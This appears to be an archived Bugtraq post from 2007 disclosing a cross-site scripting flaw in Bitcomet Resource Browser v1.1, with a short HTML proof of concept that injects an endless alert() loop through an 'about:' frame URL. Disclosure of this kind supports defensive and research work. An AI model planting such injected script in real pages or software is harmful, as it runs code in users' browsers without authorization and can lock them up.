[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Bitcomet Resource Browser v1.1 XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Bitcomet Resource Browser v1.1 XSS
From: jplopezy@xxxxxxxxx
Date: 24 Nov 2007 04:33:40 -0000

The program is vulnerable to attacks of the kind xss the parameter "about:" 
scripts without authorization in the example that I am presenting is a page 
that runs a while with a msgbox infinity.

Create an html file and paste the following code

<html>

<frameset rows="100%">

  <frame src="about:<script>while(1)alert("Juan Pablo Lopez 
Yacubian")</script>">


</frameset>

</html>

Prev by Date: [ MDKSA-2007:224-2 ] - Updated samba packages fix vulnerabilities
Next by Date: Aria-Security.net: CoolShot E-Lite POS 1.0
Previous by thread: [ MDKSA-2007:224-2 ] - Updated samba packages fix vulnerabilities
Next by thread: Aria-Security.net: CoolShot E-Lite POS 1.0
Index(es):
- Date
- Thread